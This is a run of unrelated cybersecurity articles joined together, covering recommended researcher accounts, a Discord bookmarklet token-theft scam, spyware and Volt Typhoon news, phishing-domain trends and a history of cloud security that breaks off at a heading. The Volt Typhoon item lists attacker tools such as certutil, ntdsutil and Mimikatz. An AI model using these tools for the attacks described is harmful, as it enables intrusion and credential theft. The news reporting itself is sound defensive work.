Navigating the Cybersecurity Twitterverse | 23 Influential Accounts to Follow in 2023

Since our last post showcasing prominent cybersecurity accounts worth your follow, Twitter has occupied much of the limelight with stories about the tumultuous “takeover” including lawsuits, layoffs, and circulating concerns about free speech. Following Elon Musk’s acquisition in October 2022, many Twitter users flew the coop and migrated to the more decentralized social media platform Mastodon.

Though the open-source and crowdfunded Mastodon saw a huge surge in new accounts last winter, many new Mastodon users struggled to rebuild their complex social networks and have since returned to the blue bird app. For the cybersecurity community, Twitter remains the primary social media channel for all things cyber.

In the spirit of expanding our knowledge and resources, here are 23 hand-selected Twitter accounts we recommend to all those interested in learning about a wide variety of cybersecurity topics, issues, and news!

1. @matrosov | Alex Matrosov

Alex Matrosov is CEO and co-founder of Binarly Inc., where he builds an AI-powered platform to protect devices against emerging firmware threats. Alex has more than two decades of experience with reverse engineering, advanced malware analysis, firmware security, and exploitation techniques. He served as Chief Offensive Security Researcher at Nvidia and Intel Security Center of Excellence (SeCoE).

2. @r00tbsd | Paul Rascagnères

Paul Rascagnères is a Principal Threat Researcher at Volexity. He performs investigations to identify new threats, and he has presented his findings in several publications and at international security conferences.

3. @silascutler | Silas Cutler

Silas Cutler is a Resident Hacker at Stairwell. He specializes in hunting advanced threat actors and malware developers, nation states and organized cybercrime groups. Prior to Stairwell, Silas was a threat intelligence practitioner at CrowdStrike, Google, Chronicle and Dell Secureworks.

4. @Wanna_VanTa | Van Ta

Van Ta is a Principal Threat Analyst on Mandiant’s Advanced Practices Team, where he leads historical research into the most impactful adversaries facing Mandiant’s customers. His research on various named threat actors FIN11, FIN12, FIN13, and APT41, has been referenced by both private and public organizations.

5. @n0x08 | Nate Warfield

After shipping the MS17-010, Spectre/Meltdown and Bluekeep patches in his 4.5-year tenure at the Microsoft Security Response Center, Nate Warfield is currently the Director of Threat Research & Intelligence for Eclypsium. He was featured in WIRED magazine’s “25 people doing good in 2020” for his role in starting CTI League, a volunteer group of InfoSec professionals who provided threat intelligence to hospitals during COVID-19.

6. @LittleJoeTables | Joe DeMesy

Joe DeMesy is a Principal at Bishop Fox. Joe is an expert in red teaming, secure development, proficient in several programming languages, and is a leading contributor to various open source projects. Joe is a noted expert in the field of information security, having been quoted in MarketWatch, NPR, InformationWeek, and Dark Reading. He has also presented his research at conferences such as BSidesLV, Kiwicon, BlackHat and private conferences hosted by the US Department of Defense.

7. @greglesnewich | Greg Lesnewich

Greg Lesnewich is senior threat researcher at Proofpoint, working on tracking malicious activity linked to the DPRK (North Korea). Greg has a background in threat intelligence, incident response, and managed detection, and previously built a threat intelligence program for a Fortune 50 financial organization.

8. @hasherezade | Aleksandra Doniec

Aleksandra “Hasherezade” Doniec is a prolific Malware Intelligence Analyst, software engineer, and consultant based in Warsaw, Poland. She is known for bringing valuable information on the infamous NotPetya ransomware to light and for releasing some of the most in-depth analysis on Kronos malware available yet. A Forbes 30 Under 30 alumni, she has written multiple tools and scripts used by security researchers globally today.

9. @stvemillertime | Steve Miller

Steve Miller is a New York-based security researcher focused on adversary tradecraft, operating at the intersection of incident response, threat intelligence, and detection engineering. He is an alumni analyst of Champlain College, Mandiant, the U.S. Department of Homeland Security, U.S. Department of State, U.S. Army Intelligence and Security Command (INSCOM), and the National Security Agency. Currently, Steve is a Senior Threat Intelligence Analyst for MSTIC with particular interest in YARA, Synapse, malware methods, crowdsourcing, terrestrial RF, analogue synthesizers, and emergency management.

10. @kyleehmke | Kyle Ehmke

A Threat Intelligence Researcher with ThreatConnect, Kyle Ehmke has garnered ten years of experience as a cyber intelligence analyst. His most recent work with ThreatConnect has shed light on Russian election activity and targeted efforts against Bellingcat, WADA, and others. Kyle largely focuses his research on influence operations to better understand foreign and domestic actors’ information operations infrastructure.

11. @ophirharpaz | Ophir Harpaz

A Forbes 30 Under 30 alumni, Ophir Harpaz is currently Security Research Team Lead at Akamai Technologies. She is also an active member in Baot; a community supporting women developers, data scientists, and researchers where she co-manages a tech-blogging program. Ophir has presented at many conference events on cryptomining campaigns, attacks on data centers, and financial malware. Most recently, she was awarded the Rising Star category of SC Magazine’s Reboot awards. Ophir is passionate about keeping up reverse engineering skills sharp in her free time.

12. @oxleyio | David Oxley

A Security Engineering Manager at AWS, David Oxley is an experienced leader for cyber espionage threat intelligence teams and specialized in the creation of cloud-first, threat-centric cyber threat intelligence teams in the technology sector. David’s work is driven by the intersection of human rights and cybersecurity. Prior to his work with AWS, David has investigated APT and criminal actors, served as a federal agent, worked as a digital forensic examiner, and taught in both academic and corporate settings.

13. @malwareunicorn | Amanda Rousseau

Amanda Rousseau is Principal Security Engineer at Microsoft with experience in dynamic behavior detection both on Windows and OSX platforms, reverse engineering, malware evasion techniques, and developing runtime detections. Before Microsoft, Amanda has worked with Facebook, Endgame, and FireEye, lending her skills to DoD forensic investigations and commercial incident response engagements.

14. @cybersecmeg | Meg West

Meg West is a Cybersecurity Incident Response Consultant for IBM’s X-Force Incident Response team as well as a known SME in SAP security. With over 20,000 subscribers to her cyber education YouTube channel, Meg is passionate about creating free cybersecurity content to share on various platforms and spends her free time mentoring college students as they enter the cybersecurity field. She has spoken at several international Cybersecurity conferences including ISC2’s Security Congress and SAP’s SAPPHIRE NOW.

15. @AmarSaar | Saar Amar

Saar Amar is a security researcher at MSRC with expertise on vulnerability research and exploitation. Focused on reverse engineering, low-level/internals, and cloud security, Saar is well versed in exploiting everything from operating systems to hypervisors and browsers. Saar speaks at various international cyber conferences globally and regularly publishes original research to share with the greater defense community.

16. @ale_sp_brazil | Alexandre Borges

A long-time SME in reverse engineering and digital forensic analysis, Alexandre Borges is currently at Blackstorm Security where he specializes in exploit development, threat hunting, malware analysis, and vulnerability research. He also provides cybersecurity education, training learners around the world on topics such as malware and memory analysis, mobile reversing, and more. Alexandre is the creator and administrator of the Malwoverview triage tool available on GitHub and is a regular speaker at many prominent cyber events including DEF CON USA, DEF CON CHINA, NO HAT Conference, DC2711, HITB, H2HC, and BHACK.

17. @maddiestone | Maddie Stone

Maddie Stone is a prominent security researcher on Google’s Project Zero Bug Hunting team, which is focused on identifying zero days used in the wild. Maddie has also held reverse engineering and cyber system engineering roles on Google’s Android security team and John Hopkins University’s Applied Physics Lab, respectively. She has spoken across various cybersecurity conferences and teaches workshops to help develop a new generation of cyber defenders.

18. @cyberwarship | Florian Hansemann

Munich-based Florian Hansemann is the founder of HanseSecure; an established cybersecurity company dedicated to identifying and broadcasting vulnerabilities in hardware and software to educate fellow defenders in the space. Florian has expressed interest in many areas of technical IT security but notes a special passion for red teaming and penetration testing on enterprises.

19. @dinosn | Nicolas Krassas

Nicholas Krassas, Head of Threat & Vulnerability Management for Henkel, has deep experience in malware analysis, forensic data evaluation, system and network security, reverse engineering, and auditing. Prior to Henkel, Nicholas has also worked for Hack the Box, GIG Technology, and Efffortel, holding CSO and CTO positions to handle critical cases and projects. He often shares cyber news affecting multiple industries on his Twitter account to raise awareness on the latest attacks and threat intel.

20. @h2jazi | Hossein Jazi

Hossein Jazi is currently a Senior Cyber Threat Intelligence Specialist at Fortinet with a special interest in tracking advanced persistent threats (APTs), malware analysis, cyber threat intelligence, and machine learning. Prior to his role with Fortinet, he has also worked as a threat analyst for Malwarebytes, Cysiv, Trend Micro, and Bell. Hossein’s current focus is on detecting and tracking APT campaigns in North America as well as developing big data machine learning based models to attribute threat actors.

21. @bushidotoken | Will Thomas

Will Thomas is a prominent cybersecurity researcher who has had his work featured by several well known publications such as The Telegraph, VICE, CyberScoop, BleepingComputer, TheRegister, KrebsOnSecurity, VirusTotal, and more. Currently a CTI researcher and threat hunter at the Equinix Threat Analysis Center (ETAC), he has previously appeared on Darknet Diaries, spoken at multiple conferences like DEFCON29, conINT, and NFCERT’s annual conference, and is the author of the SANS FOR589: Cybercrime Intelligence course.

22. @milenkowski | Aleksandar Milenkoski

Aleksandar Milenkoski is a Senior Threat Researcher at SentinelLabs, with expertise in reverse engineering, malware research, and threat actor analysis. Aleksandar has a PhD in system security and is the author of numerous research papers, book chapters, blog posts, and conference talks. His research has won awards from SPEC, the Bavarian Foundation for Science, and the University of Würzburg.

23. @tomhegel | Tom Hegel

Tom Hegel is a Senior Threat Researcher with SentinelLabs. He comes from a background of detection and analysis of malicious actors, malware, and global events with an application to the cyber domain. His past research has focused on threats impacting individuals and organizations across the world, primarily targeted attackers.

Conclusion

It will likely be some time before the dust settles on the futures of Twitter and other microblogging platforms, but the cybersecurity community will continue to build on shared knowledge and new research. For this post, we’ve sifted through such a small corner of Twitter to highlight 23 accounts covering a variety of malware research, reverse engineering tactics, cyber news, and more.

Don’t forget to check out our previous lists here and here and if you’re a fan of all things Apple, we even have a dedicated list of great Twitter accounts for iOS and macOS.

If you think we’ve missed any essential accounts, connect with us on Twitter by following @SentinelOne! You can also keep up to date with all of the latest threat intel coming from our SentinelLabs team on Twitter as well – we’ll be glad to meet you there.

Discord Admins Hacked by Malicious Bookmarks

A number of Discord communities focused on cryptocurrency have been hacked this past month after their administrators were tricked into running malicious Javascript code disguised as a Web browser bookmark.

This attack involves malicious Javascript that is added to one’s browser by dragging a component from a web page to one’s browser bookmarks.

According to interviews with victims, several of the attacks began with an interview request from someone posing as a reporter for a crypto-focused news outlet online. Those who take the bait are sent a link to a Discord server that appears to be the official Discord of the crypto news site, where they are asked to complete a verification step to validate their identity.

As shown in this Youtube video, the verification process involves dragging a button from the phony crypto news Discord server to the bookmarks bar in one’s Web browser. From there, the visitor is instructed to go back to discord.com and then click the new bookmark to complete the verification process.

However, the bookmark is actually a clever snippet of Javascript that quietly grabs the user’s Discord token and sends it to the scammer’s website. The attacker then loads the stolen token into their own browser session and (usually late at night after the admins are asleep) posts an announcement in the targeted Discord about an exclusive “airdrop,” “NFT mint event” or some other potential money making opportunity for the Discord members.

The unsuspecting Discord members click the link provided by the compromised administrator account, and are asked to connect their crypto wallet to the scammer’s site, where it asks for unlimited spend approvals on their tokens, and subsequently drains the balance of any valuable accounts.

Meanwhile, anyone in the compromised Discord channel who notices the scam and replies is banned, and their messages are deleted by the compromised admin account.

Nicholas Scavuzzo is an associate at Ocean Protocol, which describes itself as an “open-source protocol that aims to allow businesses and individuals to exchange and monetize data and data-based services.” On May 22, an administrator for Ocean Protocol’s Discord server clicked a link in a direct message from a community member that prompted them to prove their identity by dragging a link to their bookmarks.

Scavuzzo, who is based in Maine, said the attackers waited until around midnight in his timezone time before using the administrator’s account to send out an unauthorized message about a new Ocean airdrop.

Scavuzzo said the administrator’s account was hijacked even though she had multi-factor authentication turned on.

“A CAPTCHA bot that allows Discord cookies to be accessed by the person hosting the CAPTCHA,” was how Scavuzzo described the attack. “I’ve seen all kinds of crypto scams, but I’ve never seen one like this.”

In this conversation, “Ana | Ocean” is a compromised Discord server administrator account promoting a phony airdrop.

Importantly, the stolen token only works for the attackers as long as its rightful owner doesn’t log out and back in, or else change their credentials.

Assuming the administrator can log in, that is. In Ocean’s case, one of the first things the intruders did once they swiped the administrator’s token was change the server’s access controls and remove all core Ocean team members from the server.

Fortunately for Ocean, Scavuzzo was able to reach the operator of the server that hosts the Discord channel, and have the channel’s settings reverted back to normal.

“Thankfully, we are a globally distributed team, so we have people awake at all hours,” Scavuzzo said, noting that Ocean is not aware of any Discord community members who fell for the phony airdrop offer, which was live for about 30 minutes. “This could have been a lot worse.”

On May 26, Aura Network reported on Twitter that its Discord server was compromised in a phishing attack that resulted in the deletion of Discord channels and the dissemination of fake Aura Network Airdrop Campaign links.

On May 27, Nahmii — a cryptocurrency technology based on the Ethereum blockchain — warned on Twitter that one of its community moderators on Discord was compromised and posting fake airdrop details.

On May 9, MetrixCoin reported that its Discord server was hacked, with fake airdrop details pushed to all users.

KrebsOnSecurity recently heard from a trusted source in the cybersecurity industry who dealt firsthand with one of these attacks and asked to remain anonymous.

“I do pro bono Discord security work for a few Discords, and I was approached by one of these fake journalists,” the source said. “I played along and got the link to their Discord, where they were pretending to be journalists from the Cryptonews website using several accounts.”

The source took note of all the Discord IDs of the admins of the fake Cryptonews Discord, so that he could ensure they were blocked from the Discords he helps to secure.

“Since I’ve been doing this for a while now, I’ve built up a substantial database of Discord users and messages, so often I can see these scammers’ history on Discord,” the source said.

In this case, he noticed a user with the “CEO” role in the fake Cryptonews Discord had been seen previously under another username — “Levatax.” Searching on that Discord ID and username revealed a young Turkish coder named Berk Yilmaz whose Github page linked to the very same Discord ID as the scammer CEO.

Reached via instant message on Telegram, Levatax said he’s had no involvement in such schemes, and that he hasn’t been on Discord since his Microsoft Outlook account was hacked months ago.

“The interesting thing [is] that I didn’t use Discord since few months or even social media because of the political status of Turkey,” Levatax explained, referring to the recent election in his country. “The only thing I confirm is losing my Outlook account which connected to my Discord, and I’m already in touch with Microsoft to recover it.”

The verification method used in the above scam involves a type of bookmark called a “bookmarklet” that stores Javascript code as a clickable link in the bookmarks bar at the top of one’s browser.

While bookmarklets can be useful and harmless, malicious Javascript that is executed in the browser by the user is especially dangerous. So please avoid adding (or dragging) any bookmarks or bookmarklets to your browser unless it was your idea in the first place.

The Good, the Bad and the Ugly in Cybersecurity – Week 21

Private Sector Offensive Actor | FinFisher Execs Charged for Selling Spyware to Turkey

Prosecutors in Germany this week indicted four executives of spyware firm FinFisher for selling the FinSpy hacking tool to Turkey’s intelligence agency.

FinFisher produces cross-platform espionage tools for what it describes as “tactical intelligence gathering”, “strategic intelligence gathering”, and “deployment methods and exploitation”. The company’s marketing material states that it only partners with “Law Enforcement and Intelligence Agencies” and has a “worldwide presence”.

However, in 2020, Amnesty International warned that FinSpy was being used in campaigns targeting human rights activists, journalists and dissidents in Egypt, Ethiopia, and the United Arab Emirates (UAE) among others.

Now, German prosecutors say that FinFisher evaded export controls on its spyware in 2015 and sold it to a Bulgarian company being used as a front for Turkey’s intelligence agency. There are suggestions that the spyware was used to target opponents of President Erdoğan in 2017.

The prosecutors allege that four FinFisher executives, who were only identified by single initials, signed a deal with the Turkish government for the spyware along with technical support and training. The deal was thought to be worth around $5 million.

FinFisher has since ceased trading, but a spokesperson for the European Center for Constitutional and Human Rights warned:

“So far, companies like FinFisher have been able to export almost unhindered worldwide despite European export regulations. Today’s indictment is long overdue and will hopefully lead to the conviction of the responsible managing directors in the near future. But beyond that, the EU and its member states must take much more decisive action against the massive misuse of surveillance technology.”

Ransomware | Insider Threat As Employee Tried to Siphon Off Ransom Payment

The threat of ransomware has loomed large over the last few years, with threat actors aggressively exploiting any weaknesses they can find in organizations’ defenses and constantly innovating in response to detection and prevention strategies. But one attack vector few are looking for is an insider threat that positions themselves between the business and the ransomware gang in an attempt to steal the ransom payment.

A court in the UK this week found Ashley Liles, formerly an IT security analyst at Oxford Biomedica, guilty of doing just that after his employer was hit with a ransomware attack in February 2018. Liles was among those responsible for investigating the attack, but surreptitiously began hacking a board member’s emails as they negotiated with the attackers.

Liles altered an email from the attackers to insert his own bitcoin payment details, then created an email address similar to the attacker’s and began sending pressurizing emails to his employers.

ashley liles

Had a payment been made, it’s fairly certain that Liles would have been rapidly exposed, as the original attackers would have soon made it clear they had not received the funds. However, as the company chose not to pay the ransom, Liles received no payment and may have thought he had escaped justice.

Unfortunately for him, the unauthorized access to the board member’s emails was noticed and tracked down to Liles’ home address. Police later seized his devices and recovered incriminating evidence despite his attempts to wipe the data. Liles, now aged 28, pleaded guilty in court and will be sentenced in July.

Volt Typhoon | Chinese-sponsored Threat Actor Targets US Critical Infrastructure

CISA, the FBI and other partners have this week warned that a Chinese-backed threat actor has been targeting U.S. critical infrastructure organizations since 2021 in activity that appears designed to aid China in any potential conflict between the two superpowers. Among the targets were organizations on Guam, a vital part of America’s Asia-Pacific defense strategy and home to Anderson Air Base and Naval Base Guam.

Andersen Air Force Base Guam
Source: Andersen Air Force

The threat actor, labeled “Volt Typhoon”, leverages compromised or vulnerable small office/home office (SOHO) devices to gain initial access to organization’s networks. Observed TTPs include exploiting CVE-2021-40539 and CVE-2021-27860 and attacking devices such as ASUS, Cisco RV, Draytek Vigor, FatPipe IPVPN/MPVPN/WARP, Fortinet Fortigate, Netgear Prosafe, and Zyxel USG.

Having once gained a foothold, the threat actor relies heavily on Windows LOLBins – legitimate programs already installed on host computers – to conduct its malicious activities and evade discovery.

CISA’s advisory noted that the actor makes use of WMI/WMIC to stealthily gather information about local drives, as WMI logging is not enabled by default. PowerShell and certutil were among a long list of living off the land tools used for discovery, lateral movement and collection:

  • certutil
  • dnscmd
  • ldifde
  • makecab
  • net user/group/use
  • netsh
  • nltest
  • ntdsutil
  • PowerShell
  • req query/save
  • systeminfo
  • tasklist
  • wevtutil
  • wmic
  • xcopy

In addition, “hacktools” such as FRP (Fast Reverse Proxy), Impacket, and Mimikatz as well as remote administration tools were also characteristic of the attacks.

Researchers believe that the primary objective of Volt Typhoon is to enable China to disrupt critical communications infrastructure during any future crisis, and organizations are on alert that the same stealthy tactics seen in this campaign could be used against organizations worldwide. The joint advisory contains detailed information on threat hunting and detection mitigations.

Phishing Domains Tanked After Meta Sued Freenom

The number of phishing websites tied to domain name registrar Freenom dropped precipitously in the months surrounding a recent lawsuit from social networking giant Meta, which alleged the free domain name provider has a long history of ignoring abuse complaints about phishing websites while monetizing traffic to those abusive domains.

The volume of phishing websites registered through Freenom dropped considerably since the registrar was sued by Meta. Image: Interisle Consulting.

Freenom is the domain name registry service provider for five so-called “country code top level domains” (ccTLDs), including .cf for the Central African Republic; .ga for Gabon; .gq for Equatorial Guinea; .ml for Mali; and .tk for Tokelau.

Freenom has always waived the registration fees for domains in these country-code domains, but the registrar also reserves the right to take back free domains at any time, and to divert traffic to other sites — including adult websites. And there are countless reports from Freenom users who’ve seen free domains removed from their control and forwarded to other websites.

By the time Meta initially filed its lawsuit in December 2022, Freenom was the source of well more than half of all new phishing domains coming from country-code top-level domains. Meta initially asked a court to seal its case against Freenom, but that request was denied. Meta withdrew its December 2022 lawsuit and re-filed it in March 2023.

“The five ccTLDs to which Freenom provides its services are the TLDs of choice for cybercriminals because Freenom provides free domain name registration services and shields its customers’ identity, even after being presented with evidence that the domain names are being used for illegal purposes,” Meta’s complaint charged. “Even after receiving notices of infringement or phishing by its customers, Freenom continues to license new infringing domain names to those same customers.”

Meta pointed to research from Interisle Consulting Group, which discovered in 2021 and again last year that the five ccTLDs operated by Freenom made up half of the Top Ten TLDs most abused by phishers.

Interisle partner Dave Piscitello said something remarkable has happened in the months since the Meta lawsuit.

“We’ve observed a significant decline in phishing domains reported in the Freenom commercialized ccTLDs in months surrounding the lawsuit,” Piscitello wrote on Mastodon. “Responsible for over 60% of phishing domains reported in November 2022, Freenom’s percentage has dropped to under 15%.”

Interisle collects data from 12 major blocklists for spam, malware, and phishing, and it receives phishing-specific data from Spamhaus, Phishtank, OpenPhish and the APWG Ecrime Exchange. The company publishes historical data sets quarterly, both on malware and phishing.

Piscitello said it’s too soon to tell the full impact of the Freenom lawsuit, noting that Interisle’s sources of spam and phishing data all have different policies about when domains are removed from their block lists.

“One of the things we don’t have visibility into is how each of the blocklists determine to remove a URL from their lists,” he said. “Some of them time out [listed domains] after 14 days, some do it after 30, and some keep them forever.”

Freenom did not respond to requests for comment.

This is the second time in as many years that a lawsuit by Meta against a domain registrar has disrupted the phishing industry. In March 2020, Meta sued domain registrar giant Namecheap, alleging cybersquatting and trademark infringement.

The two parties settled the matter in April 2022. While the terms of that settlement have not been disclosed, new phishing domains registered through Namecheap declined more than 50 percent the following quarter, Interisle found.

Phishing attacks using websites registered through Namecheap, before and after the registrar settled a lawsuit with Meta. Image: Interisle Consulting.

Unfortunately, the lawsuits have had little effect on the overall number of phishing attacks and phishing-related domains, which have steadily increased in volume over the years.  Piscitello said the phishers tend to gravitate toward registrars that offer the least resistance and lowest price per domain. And with new top-level domains constantly being introduced, there is rarely a shortage of super low-priced domains.

“The abuse of a new top-level domain is largely the result of one registrar’s portfolio,” Piscitello told KrebsOnSecurity. “Alibaba or Namecheap or another registrar will run a promotion for a cheap domain, and then we’ll see flocking and migration of the phishers to that TLD. It’s like strip mining, where they’ll buy hundreds or thousands of domains, use those in a campaign, exhaust that TLD and then move on to another provider.”

Piscitello said despite the steep drop in phishing domains coming out of Freenom, the alternatives available to phishers are many. After all, there are more than 2,000 accredited domain registrars, not to mention dozens of services that let anyone set up a website for free without even owning a domain.

“There is no evidence that the trend line is even going to level off,” he said. “I think what the Meta lawsuit tells us is that litigation is like giving someone a standing eight count. It temporarily disrupts a process. And in that sense, litigation appears to be working.”

Evolution of Cloud Security | Looking At Cloud Posture Management Throughout the Decades

When cloud computing saw its earliest waves of adoption, businesses only had to decide whether or not they wanted to adopt it. The notion of cloud security in these first few years came as a secondary consideration. Though cloud computing has undergone many improvements since it made a splash following the advent of the World Wide Web, the challenge of cloud security has only become more complex and the need for it more acute.

Today’s hyperconnected world sees the cloud surface face a variety of risks from ransomware and supply chain attacks to insider threats and misconfigurations. As more businesses have moved their operations and sensitive data to the cloud, securing this environment against developing threats continues to be an ever-changing challenge for leaders.

This post walks through a timeline of how cloud security has grown over recent years to combat new and upcoming risks associated with its use. Following this timeline, security leaders can implement the latest in cloud security based on their own unique business requirements.

The Early 00s | Cloud Security In Its Infancy

When businesses first began to embrace the web in the 90s, the need for data centers boomed. Many businesses had a newfound reliance on shared hosting as well as the dedicated servers upon which their operations were run. Shortly after the turn of the century, this new, virtual environment became known as the “cloud”. Blooming demand for the cloud then spurred a digital race between Amazon, Microsoft, and Google to gain more shares across the market as cloud providers.

Now that the idea and benefits of cloud technology gained widespread attention, the tech giants of the day focused on relieving businesses of the big investments needed for computing hardware and expensive server maintenance. Amazon Web Services (AWS), and later, Google Docs and Microsoft’s Azure and Office 365 suite all provided an eager market with more and more features and ways to rely on cloud computing.

However, the accelerating rates of data being stored in the cloud bred the beginnings of a widening attack surface that would signal decades of cloud-based cyber risks and attacks for many businesses. Cyberattacks on the cloud during this time mostly targeted individual computers, networks, and internet-based systems. These included:

  • Malware AttacksMalicious software, such as viruses, worms, and trojans, were prevalent in this decade. These attacks often spread through email attachments, infected software, or compromised websites and posed significant risks to individual computer systems connected to the internet and cloud.
  • Network Exploits – Exploits targeting vulnerabilities in network protocols and services were common in the 1990s. Attackers would exploit weaknesses in network infrastructure, operating systems, or software applications to gain unauthorized access, perform privilege escalation, or conduct data exfiltration.
  • Social Engineering Attacks – Social engineering attacks, such as phishing and impersonation, were prevalent throughout the 90s. Attackers would manipulate users through deceptive tactics to trick them into revealing sensitive information, such as login credentials or financial details.

Cloud security, in this decade, thus put their focus on network security and access management. Dedicated attacks targeting cloud environments became more prominent in the following decades as cloud computing gained traction across various industries.

The Roaring 2000s | The Millennial Age of Cloud Security

In the 2000s, the cybersecurity landscape continued to evolve rapidly, and the specific types and sophistication of attacks targeting cloud environments expanded. Cloud computing was becoming more popular, and cyberattacks specifically targeting cloud environments started to emerge. This decade marked a new stage of cloud security challenges directly proportional to the significant increase in the adoption of cloud.

While past its infancy, cloud computing was not as prevalent as it is now, and many businesses still relied on traditional on-premises infrastructure for their computing needs. Consequently, the specific security concerns related to cloud environments were not widely discussed or understood.

Cloud security measures in the 2000s were relatively basic compared to today’s standards. To secure network connections and protect data in transit, security measures for cloud primarily focused on Virtual Private Networks (VPNs); commonly used to establish secure connections between on-premises infrastructure and the cloud provider’s network. Further, organizations relied heavily on traditional security technologies that were adapted for these new cloud environments. Firewalls, intrusion detection systems, and access control mechanisms were employed to safeguard network traffic and protect against unauthorized access.

The 2000s also saw few industry-specific compliance standards and regulations explicitly addressing cloud security. Since compliance requirements were generally focused on traditional on-premises environments, many businesses had to find their own way, testing out combinations of security measures through trial and errors since there were no standardized cloud security best practices.

Cloud security at the beginning of the millennium was largely characterized by limited control and visibility and heavily reliant on the security measures implemented by the cloud service providers. In many cases, customers had limited control over the underlying infrastructure and had to trust the provider’s security practices and infrastructure protection. This also meant that customers had limited visibility over their cloud environments, adding to the challenge of monitoring and managing security incidents and vulnerabilities across the cloud infrastructure.

The 2010s | Cloud Security Gaining A Global Momentum

In the 2010s, cloud security experienced significant advancements as cloud computing matured and became a staple of many businesses’ infrastructures. In turn, attacks on the cloud surface had also evolved into much more sophisticated and frequent events.

Data breaches occupied many news headlines in the 2010s, with attackers targeting cloud environments for cryptojacking or to gain unauthorized access to sensitive data. Many companies fell victim to compromises that leveraged stolen credentials, misconfigurations, and overly permissive identities. A lack of visibility into the cloud surface meant breaches could go undiscovered for extended periods.

Many high-profile breaches exposed large amounts of sensitive data stored in the cloud including:

  • 150 million breached records from Adobe found on a hacker site in 2013,
  • The Apple iCloud breach in 2014 resulting in a mass amount of private photos leaked, and
  • 300 million compromised Facebook accounts found listed for sale on the dark web in 2019.
  • 100 million credit card customers affected by a breach at Capital One in 2019.

The severity of cloud-based attacks lead to increased awareness of the importance of cloud security. Organizations recognized the need to secure their cloud environments and began implementing specific security measures. As cloud adoption continued to grow, so did the motivation for attackers to exploit cloud-based infrastructure and services. Cloud providers and organizations responded by increasing their focus on cloud security practices, implementing stronger security controls, and raising awareness for globally recognized countermeasures.

Enter the Cloud Shared Responsibility Model. Introduced by cloud service providers (CSPs) to clarify the division of security responsibilities between the CSP and the customers utilizing their services, the model gained significant prominence and formal recognition in the 2010s.

During this period, major providers such as Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform (GCP) began emphasizing the shared responsibility model as part of their cloud service offerings. They defined the respective security responsibilities of the provider and the customer, outlining the areas for which each party was accountable. This model helped a generation of businesses better understand their role in cloud security and enabled them to implement appropriate security measures to protect their assets.

This decade also popularized the services of cloud access security brokers (CASBs); a term coined by Gartner in 2012 and defined as:

“On-premises, or cloud-based security policy enforcement points, placed between cloud service consumers and cloud service providers to combine and interject enterprise security policies as the cloud-based resources are accessed. CASBs consolidate multiple types of security policy enforcement. Example security policies include authentication, single sign-on, authorization, credential mapping, device profiling, encryption, tokenization, logging, alerting, malware detection/prevention and so on.”

To help businesses navigate and address the changing cloud security landscape, CASBs emerged as a critical security solution for organizations, acting as intermediaries between cloud service providers and consumers. Their main goals were to provide visibility, control, and security enforcement across cloud environments through services such as data loss prevention (DLP), cloud application discovery, encryption and tokenization, compliance, and governance.

The 2010s saw the emergence of Cloud Security Posture Management solutions and was also the starting point for improved compliance and standardization for the use of cloud in modern businesses. Industry-specific compliance standards and regulations began to address cloud security concerns more explicitly. Frameworks such as the Cloud Security Alliance (CSA) Cloud Controls Matrix and both ISO 27017 and ISO 27018 now sought to provide guidelines for cloud security best practices.

The 2020s | Paving the Future of Cloud Security

In current times, cloud technology has laid down a foundation for a modern, digital means of collaboration and operations on a large scale. Especially since the COVID-19 pandemic and the rise of remote workforces, more businesses than ever before are moving towards hybrid or complete cloud environments.

While cloud technologies, services, and applications are mature and commonly used across all industry verticals, security leaders are still facing challenges of securing this surface and meeting new and developing threats. Modern businesses need a cloud posture management strategy to effectively manage and secure their cloud environments. This involves several key elements to ensure agile and effective protection against today’s cloud-based risks.

Cloud Security Posture Management (CSPM)

CSPM solutions have now gained a large amount of traction, enabling organizations to continuously assess and monitor their cloud environments for security risks and compliance. CSPM tools offer visibility into misconfigurations, vulnerabilities, and compliance violations across cloud resources, helping organizations maintain a secure posture.

An essential element of CSPM is cloud attack surface management. Since cloud environments introduce unique security challenges, a cloud posture management strategy helps businesses assess and mitigate risks. It allows organizations to establish and enforce consistent security controls, monitor for vulnerabilities, misconfigurations, and potential threats, and respond to security incidents in a timely manner. A robust strategy enhances the overall security posture of the cloud infrastructure, applications, and data.

CSPM also encompasses what’s called the “shift-left” paradigm, a cloud security practice that integrates security measures earlier in the software development and deployment lifecycle. Rather than implementing security as a separate and downstream process, the shift left addresses vulnerabilities and risks at the earliest possible stage, reducing the likelihood of security issues and improving overall security posture. It emphasizes the proactive inclusion of security practices and controls from the initial stages of development, rather than addressing security as an afterthought or at later stages.

In addition, Cloud Infrastructure Entitlement Management (CIEM) tools have emerged to help organizations manage access entitlements across multicloud environments, helping to reduce the risks associated with excessive permissions.

Kubernetes Security Posture Management (KSPM)

As cloud adoption rates continue to increase, many businesses have turned to Kubernetes (K8s) to help orchestrate and automate the deployment of containerized applications and services. K8s has risen as a popular choice for many security teams that leverage its mechanism for reliable container image build, deployment, and rollback, which ensures consistency across deployment, testing, and product.

To better assess, monitor and maintain the security of k8s, teams often use the Kubernetes Security Posture Management (KSPM) framework to evaluate and enhance the security posture of Kubernetes clusters, nodes, and the applications running on them. It involves a combination of various activities including risk assessments of the k8 deployment, configuration management for the clusters, image security, network security, pod security, and continuous monitoring of the Kubernetes API server to detect suspicious or malicious behavior.

Additionally, Cloud Workload Protection Platform (CWPPs) and runtime security helps protect workloads against active threats once the containers have been deployed. Implementing K8s runtime security tools protects businesses from malware that may be hidden in container images, privilege escalation attacks exploiting bugs in containers, gaps in access control policies, or unauthorized access to sensitive information that running containers can read.

Zero Trust Architecture

The zero trust security model has gained prominence in the 2020s. It emphasizes the principle of “trust no one” and requires authentication, authorization, and continuous monitoring for all users, devices, and applications, regardless of their location or network boundaries. Zero trust architecture helps mitigate the risk of unauthorized access and lateral movement within cloud environments.

Implementing the zero trust security model means taking a proactive and robust approach to protecting cloud environments from evolving cyber threats. Compared to traditional network security models, which relied on perimeter-based defenses and assuming that everything inside the network is trusted, zero trust architecture:

  • Eliminates the concept of implicit trust to minimize the risk of unauthorized access, data breaches, and lateral movement within the infrastructure.
  • Makes identity the cornerstone of security by focusing on strong authentication mechanisms.
  • Enables fine-grained access controls, allowing organizations to enforce access policies based on various contextual factors such as user roles, device health, location, and behavior.
  • Leverages technologies like user and entity behavior analytics (UEBA), threat intelligence, and real-time monitoring to detect anomalous behavior, potential threats, and security incidents.
  • Promotes the use of encryption and data protection mechanisms to secure data within cloud environments, using end-to-end encryption for data in transit and at rest to protect sensitive information from unauthorized access or interception.

Cloud-Native Security Tools, Continuous Monitoring & Incident Response

